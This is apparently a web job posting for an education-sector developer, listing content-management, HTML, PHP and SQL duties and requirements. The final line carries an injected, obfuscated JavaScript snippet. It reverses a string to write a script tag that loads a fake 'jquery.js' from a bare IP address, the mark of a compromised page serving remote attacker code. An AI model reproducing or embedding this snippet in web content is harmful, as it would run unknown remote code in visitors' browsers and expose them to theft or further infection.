Industry : Education
– Work closely with Project Managers and other members of the Development Team to both develop detailed specification documents with clear project deliverables and timelines, and to ensure timely completion of deliverables.
– Create, develop and manage content for organization’s web presence (requires working with content management software)
– Determine appropriate architecture, and other technical solutions, and make relevant recommendations to users and management.
– Alert colleagues to emerging technologies or applications and the opportunities to integrate them into operations and activities.
– Be actively involved in and contribute regularly to the development community of the LCMS and portal.
– Degree in ICT or any relevant majors.
– Minimum 3-5 years of experiences in development, enhancing, monitoring and maintenance ICT infrastructure and software/hardware peripherals.
– Experience in developing, implementing and managing in-house and enterprise applications
– Experience in technical project implementation
– Experience in programming and market research with some experience in the Education industry.
– Advanced knowledge of HTML and experience with popular content management systems (Drupal, Convio, Kintera, WordPress, Oracle, etc.)
– Must have strong skills in Photoshop, Fireworks, or equivalent application(s).
– 3-5 years’ experience managing content and production for high traffic websites
– 3 years minimum experience with HTML/XHTML and CSS
– 2 years minimum Web programming experience, including PHP, ASP or JSP
– 1 year minimum experience working with relational database systems such as MySQL, MSSQL or Oracle and a good working knowledge of SQL
– Development experience using extensible web authoring tools
– Experience developing and implementing open source software projects document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))